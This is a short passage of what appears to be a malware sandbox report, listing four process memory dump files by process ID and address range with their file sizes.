                                                                                                  • memory/4308-112-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/4540-457-0x00000293B9940000-0x00000293B9C90000-memory.dmp

                                                                                                    Filesize

                                                                                                    3.3MB

                                                                                                  • memory/4540-267-0x00000293B9460000-0x00000293B9934000-memory.dmp

                                                                                                    Filesize

                                                                                                    4.8MB

                                                                                                  • memory/4540-51-0x00000293B8E60000-0x00000293B8E78000-memory.dmp

                                                                                                    Filesize

                                                                                                    96KB